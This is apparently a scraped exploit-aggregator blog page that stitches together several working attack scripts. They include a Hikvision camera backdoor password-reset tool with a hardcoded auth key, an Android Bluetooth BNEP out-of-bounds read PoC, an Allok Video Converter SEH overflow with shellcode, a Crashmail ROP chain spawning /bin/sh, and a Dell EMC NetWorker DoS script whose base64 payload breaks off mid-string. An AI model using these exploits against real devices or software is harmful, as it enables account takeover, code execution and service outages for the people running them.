# Exploit Title: Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds: 140721 - 170109) Backdoor
# Date: 15-03-2018
# Vendor Homepage: http://www.hikvision.com/en/
# Exploit Author: Matamorphosis
# Category: Web Apps
# Description: Exploits a backdoor in Hikvision camera firmware versions 5.2.0 - 5.3.9 (Builds: 140721 - 170109), deployed between 2014 and 2016, to assist the owner recover their password.
# Vulnerability Exploited: ICSA-17-124-01 - http://seclists.org/fulldisclosure/2017/Sep/23
#!/usr/bin/env python
# Usage: python exploit.py [IP Address] [Port] [SSL (Y/N)]
import requests
import re
import sys
# BASIC INFO
newPass = "@Dm1N1$Tr80R" # EXAMPLE OF A PASSWORD COMPLIANT WITH LATER FIRMWARES REQUIRING AT LEAST 2 UPPERCASE, 2 lowercase, and 2 SPECIAL CHARACTERS.
BackdoorAuthArg = "auth=YWRtaW46MTEK"; # AUTHENTICATION KEY.
ip = ""
port = 0
SSL = ""
userID = ""
userName = ""
def Usage():
print("[i] Usage: python exploit.py [IP Address] [Port] [SSL (Y/N)]")
try:
ip = sys.argv[1]
SSL = sys.argv[3]
except:
print("[-] One or more of the arguments is missing.")
Usage()
sys.exit()
ipmatch = re.search(r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b", ip) # IP ADDRESS REGULAR EXPRESSION.
if not ipmatch:
print("[-] The entered ip address " + ip + " is not in the correct format.")
Usage()
sys.exit()
try:
port = int(sys.argv[2])
except:
print("[-] The entered port " + sys.argv[2] + " is not a number.")
Usage()
sys.exit()
if (port == 0) or (port > 65535):
print("[-] The entered port " + sys.argv[2] + " is not a valid port number.")
Usage()
sys.exit()
if SSL == "Y":
protocol = "https"
else:
protocol = "http"
URLBase = protocol + "://" + ip + ":" + str(port) + "/" # URL BASE FOR FUTURE REQUESTS.
URLDownload = URLBase + "Security/users?" + BackdoorAuthArg # DOWNLOAD REQUEST.
print("[+] Getting User List.")
DownloadResponse = requests.get(URLDownload).text
for line in DownloadResponse: # RETRIEVING USER LIST
useridmatch = re.search(r"<id>(.*)<\/id>", line) # CHECK FOR USER ID.
usernamematch = re.search(r"<userName>(.*)<\/userName>", line) # CHECK FOR USER NAME.
if useridmatch:
userID = useridmatch.group(1)
print("[+] User ID: " + userID)
if usernamematch:
userName = usernamematch.group(1)
print("[+] Username: " + userName)
userID = raw_input("[?] Which User ID would you like to use? ")
userName = raw_input("[?] Which Username would you like to use? ")
print("[+] Using the User " + userName + ".")
userXML = ( '<User version=""1.0"" xmlns=""http://www.hikvision.com/ver10/XMLSchema"">\r\n<id>' + userID + '</id>\r\n<userName>' + userName + '</userName>\r\n<password>' + newPass + '</password>\r\n</User>' ) # OUR CRAFTED XML CONFIGURATION FILE
#print(userXML)
URLUpload = URLBase + "Security/users/" + userID + "?" + BackdoorAuthArg # UPLOAD REQUEST.
print("[+] Changing Password now.")
print requests.put(URLUpload, data=userXML).text # UPLOAD REQUEST, SENDING THE PAYLOAD.
print("[+] Complete. Please try logging in with these credentials. Username: " + userName + "Password: " + newPass)
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863563784
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
import os
import sys
import struct
import bluetooth
BNEP_PSM = 15
BNEP_FRAME_CONTROL = 0x01
# Control types (parsed by bnep_process_control_packet() in bnep_utils.cc)
BNEP_SETUP_CONNECTION_REQUEST_MSG = 0x01
def oob_read(src_bdaddr, dst):
bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP)
bnep.settimeout(5)
bnep.bind((src_bdaddr, 0))
print 'Connecting to BNEP...'
bnep.connect((dst, BNEP_PSM))
bnep.settimeout(1)
print "Triggering OOB read (you may need a debugger to verify that it's actually happening)..."
# This crafted BNEP packet just contains the BNEP_FRAME_CONTROL frame type,
# plus the BNEP_SETUP_CONNECTION_REQUEST_MSG control type.
# It doesn't include the 'len' field, therefore it is read from out of bounds
bnep.send(struct.pack('<BB', BNEP_FRAME_CONTROL, BNEP_SETUP_CONNECTION_REQUEST_MSG))
try:
data = bnep.recv(3)
except bluetooth.btcommon.BluetoothError:
data = ''
if data:
print '%r' % data
else:
print '[No data]'
print 'Closing connection.'
bnep.close()
def main(src_hci, dst):
os.system('hciconfig %s sspmode 0' % (src_hci,))
os.system('hcitool dc %s' % (dst,))
oob_read(src_hci, dst)
if __name__ == '__main__':
if len(sys.argv) < 3:
print('Usage: python bnep02.py <src-bdaddr> <dst-bdaddr>')
else:
if os.getuid():
print 'Error: This script must be run as root.'
else:
main(sys.argv[1], sys.argv[2])
# SWAMI KARUPASAMI THUNAI
###############################################################################
# Exploit Title: Allok Video Converter - Buffer Overflow Vulnerability (Windows XP SP3)
# Date: 06-03-2018
# Exploit Author: Mohan Ravichandran & Velayutham Selvaraj
# Organization : TwinTech Solutions
# Vulnerable Software: Allok Video Converter
# Vendor Homepage: http://www.alloksoft.com
# Version: 4.6.1217
# Software Link: http://www.alloksoft.com/allok_vconverter.exe
# Tested On: Windows XP Service Pack 3 (Version 2002)
#
# Credit to Velayutham Selvaraj for discovering the Vulnerbility
# Vulnerability Disclosure Date : 2018-03-06
#
# Manual steps to reproduce the vulnerability ...
#1. Download and install the "setup(allok_vconverter.exe)" file
#2. Run this exploit code via python 2.7
#3. A file "exploit.txt" will be created
#4. Copy the contents of the file and paste in the License Name field
# Name > exploit.txt
#5. Type some random character in License Code
#6. Click Register and voila !
#7. Boom calculator opens
#
##############################################################################
import struct
file = open("exploit.txt","wb")
buflen = 4000
junk = "A" * 780
nseh = "\x90\x90\xeb\x10"
seh = struct.pack("<L",0x10019A09)
nops = "\x90" * 20
# The below shellcode will open calculator, but can be modified by need.
shellcode = ""
shellcode +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
shellcode +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
shellcode +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
shellcode +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
shellcode +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
shellcode +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
shellcode +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
shellcode +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
shellcode +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
shellcode +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
shellcode +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
shellcode +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
shellcode +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
shellcode +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
shellcode +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
shellcode +="\xc4\xd9"
exploit = junk + nseh + seh + nops + shellcode
fillers = buflen - len(exploit)
buf = exploit + "D" * fillers
file.write(buf)
file.close()
# Exploit author: Juan Sacco <jsacco@exploitpack.com>
# Website: http://exploitpack.com
#
# Description: Crashmail is prone to a stack-based buffer overflow because the application fails to perform adequate boundary checks on user supplied input.
# Impact: An attacker could exploit this vulnerability to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition.
# Vendor homepage: http://ftnapps.sourceforge.net/crashmail.html
# Affected version: 1.6 ( Latest )
import os, subprocess
from struct import pack
p = lambda x : pack('I', x)
IMAGE_BASE_0 = 0x08048000 # ./crashmail
rebase_0 = lambda x : p(x + IMAGE_BASE_0)
# Control of EIP at 216
# ROP chain: execve ( binsh )
# Static-linked
junk = 'A'*216 # Fill
ropchain = rebase_0(0x0002ecdf) # 0x08076cdf: pop eax; ret;
ropchain += '//bi'
ropchain += rebase_0(0x000705aa) # 0x080b85aa: pop edx; ret;
ropchain += rebase_0(0x000e9060)
ropchain += rebase_0(0x0002b42d) # 0x0807342d: mov dword ptr [edx], eax; ret;
ropchain += rebase_0(0x0002ecdf) # 0x08076cdf: pop eax; ret;
ropchain += 'n/sh'
ropchain += rebase_0(0x000705aa) # 0x080b85aa: pop edx; ret;
ropchain += rebase_0(0x000e9064)
ropchain += rebase_0(0x0002b42d) # 0x0807342d: mov dword ptr [edx], eax; ret;
ropchain += rebase_0(0x000391a0) # 0x080811a0: xor eax, eax; ret;
ropchain += rebase_0(0x000705aa) # 0x080b85aa: pop edx; ret;
ropchain += rebase_0(0x000e9068)
ropchain += rebase_0(0x0002b42d) # 0x0807342d: mov dword ptr [edx], eax; ret;
ropchain += rebase_0(0x000001f9) # 0x080481f9: pop ebx; ret;
ropchain += rebase_0(0x000e9060)
ropchain += rebase_0(0x000e0e80) # 0x08128e80: pop ecx; push cs; adc
al, 0x41; ret;
ropchain += rebase_0(0x000e9068)
ropchain += rebase_0(0x000705aa) # 0x080b85aaop edx; ret;
ropchain += rebase_0(0x000e9068)
ropchain += rebase_0(0x0002ecdf) # 0x08076cdf: pop eax; ret;
ropchain += p(0xfffffff5)
ropchain += rebase_0(0x00051dc7) # 0x08099dc7: neg eax; ret;
ropchain += rebase_0(0x00070e80) # 0x080b8e80: int 0x80; ret;
evil_buffer = junk + ropchain
print "[*] Exploit Pack http://exploitpack.com - Author: jsacco@exploitpack.com"
print "[*] Crashmail 1.6 - BoF ( ROP execve)"
print "[?] Payload can be read trough a file or STDIN"
try:
subprocess.call(["./crashmail","SETTINGS", evil_buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "[!] Crashmail not found"
else:
print "[*] Error executing exploit"
raise
'''
# Exploit Title: Dell EMC NetWorker DoS PoC
# Date: 18.03.2018
# Exploit Author: Marek Cybul
# Vendor Homepage: https://www.emc.com/data-protection/networker.htm
# Versions:
Dell EMC NetWorker versions prior to 9.2.1.1
Dell EMC NetWorker versions prior to 9.1.1.6
Dell EMC NetWorker 9.0.x
Dell EMC NetWorker versions prior to 8.2.4.11
# Tested on: 8.2.1.2.Build.764 and 9.1.0.4.Build.82 RHEL7
# CVE : CVE-2018-1218
http://seclists.org/fulldisclosure/2018/Mar/43
'''
#!/usr/bin/python
import sys, base64, socket, time
scan = False
if len(sys.argv) < 2:
print "USAGE: ./emc_networker_dos.py <addr> <nsrd_port>"
sys.exit(1)
elif len(sys.argv) == 2:
nsrd_addr = str(sys.argv[1])
print "[i] Scanning for active nsrd service..."
nsrd_port = 0
else:
nsrd_addr = str(sys.argv[1])
nsrd_port = int(sys.argv[2])
part1 = """gAABBEoWuaoAAAAAAAAAAgAF890AAAACAAAAaAAAdT0AAAAIAAAAAVoVhWQAAAAAAAAAAAAAAAEA
AABhY3Rpb24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAA
AAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAF
TW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAAB
AAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZw
ZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAA
AAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1
bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAA
AAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3Zl
cnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAA
AAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkA
AAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEA
AAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUA
AAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAA
AAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAA
AAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAA
BGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24A
AAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAI
b3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAA
AAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRo
bHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAA
AAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5h
bWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAA
AQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAA
AAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAAB
AAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0
b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEA
AAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgA
AAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01v
bnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QA
AAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAA
BG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAA
AAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAAB
cwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUA
AAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAA
AAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAA
AAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9u
dGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAA
B01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJp
b2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAAB
AAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwA
AAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEA
AAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJp
ZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAA
AQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAA
AAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAF
TW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAAB
AAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZw
ZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAA
AAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1
bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAA
AAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3Zl
cnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAA
AAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkA
AAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEA
AAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUA
AAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAA
AAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAA
AAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAA
BGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24A
AAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAI
b3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAA
AAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRo
bHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAA
AAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5h
bWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAA
AQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAA
AAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAAB
AAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0
b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEA
AAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgA
AAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01v
bnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QA
AAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAA
BG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAA
AAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAAB
cwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUA
AAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAA
AAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAA
AAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9u
dGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAA
B01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJp
b2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAAB
AAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwA
AAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEA
AAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJp
ZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAA
AQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAA
AAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAF
TW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAAB
AAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZw
ZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAA
AAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1
bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAA
AAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3Zl
cnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAA
AAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkA
AAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEA
AAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUA
AAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAA
AAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAA
AAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAA
BGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24A
AAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAI
b3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAA
AAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRo
bHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAA
AAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5h
bWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAA
AQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAA
AAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAAB
AAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0
b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEA
AAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgA
AAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01v
bnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QA
AAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAA
BG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAA
AAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAAB
cwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUA
AAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9udGgAAAAAAAAAAAAAAQAA
AAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAAB01vbnRobHkAAAAAAAAA
AAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJpb2QAAAAAAAEAAAAFTW9u
dGgAAAAAAAAAAAAAAQAAAAR0b24AAAAAAAEAAAABcwAAAAAAAAAAAAABAAAABG5hbWUAAAABAAAA
B01vbnRobHkAAAAAAAAAAAEAAAAIb3ZlcnJpZGUAAAABAAAABGZ1bGwAAAAAAAAAAQAAAAZwZXJp
